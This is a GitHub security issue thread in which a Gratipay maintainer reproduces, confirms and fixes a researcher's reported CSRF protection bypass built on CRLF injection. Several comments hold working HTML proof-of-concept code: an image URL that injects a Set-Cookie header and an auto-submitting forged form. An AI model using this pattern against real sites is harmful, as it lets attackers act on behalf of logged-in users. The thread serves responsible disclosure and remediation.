New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF Protection Bypass #1

Closed
chadwhitacre opened this Issue Jun 16, 2015 · 8 comments

Comments

Projects
None yet
1 participant
@chadwhitacre
Contributor

chadwhitacre commented Jun 16, 2015

https://gratipay.freshdesk.com/helpdesk/tickets/2305

== CSRF Protection Bypass (Chrome, Internet Explorer) ==

  1. Change name in form action to victim name
  2. Open html PoC

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">

Result in attach

screenshot at 00-10-57

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 16, 2015

I tried with this poc, and was not able to reproduce his result (except when I was logged in as the target, or as an admin):

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
<form action="https://gratipay.com/~lgtest/statement.json" method="POST">
    <input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
    <input type="hidden" name="lang" value="en">
    <input type="input" name="content">
    <button type="submit">Submit</button>
</form>
@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 16, 2015

To: [researcher]

The first issue you reported has already been reported [https://github.com/gratipay/security-b50267/issues/1].

The second and third are new reports. I've confirmed your result for the second report [https://github.com/gratipay/security-qf35us/issues/1], and we'll be happy to add you to our Hall of Fame when we fix that bug.

I haven't yet reconstructed the HTML PoC you used for the third report. Are you able to provide that?

Thanks for the reports!

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 17, 2015

From: [researcher]

Hi, this CSRF bypass uses CRLF Injection. (Do not forget to change the name in the form action)

<form id="csrf" action="https://gratipay.com/~fickov/statement.json" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="content" value="CSRF&#95;TEST" />
<input type="hidden" name="csrf&#95;token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;" onerror="csrf.submit()">
@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 17, 2015

Right. The point of a CSRF is to initiate an action on Gratipay for a logged-in user, when that logged-in user visits a third-party website. My poc reconstruction was accurate, I was just not interpreting the results properly.

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 17, 2015

To: [researcher]

Thanks, []. Bug confirmed. I'll contact you again when we've fixed it.

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jun 29, 2015

Deploying gratipay/security-qf35us#2 ought to fix this.

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jul 2, 2015

Confirmed fixed.

chadwhitacre added a commit to gratipay/gratipay.com that referenced this issue Jul 23, 2015

chadwhitacre added a commit to gratipay/gratipay.com that referenced this issue Jul 23, 2015

@chadwhitacre

This comment has been minimized.

Contributor

chadwhitacre commented Jul 29, 2015

To: researcher

The CRLF Injection and CSRF Protection Bypass bugs should be fixed now. Please confirm.

I've added you to our legacy Halls of Fame for Aspen (for the CRLF injection) and Gratipay (for the CSRF protection bypass):

http://aspen.io/security.txt
https://gratipay.com/about/security/hall-of-fame

We've now migrated our security program to HackerOne. If you would like acknowledgement on HackerOne feel free to re-file the bugs there and I will resolve them.

Thanks for the reports! :-)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment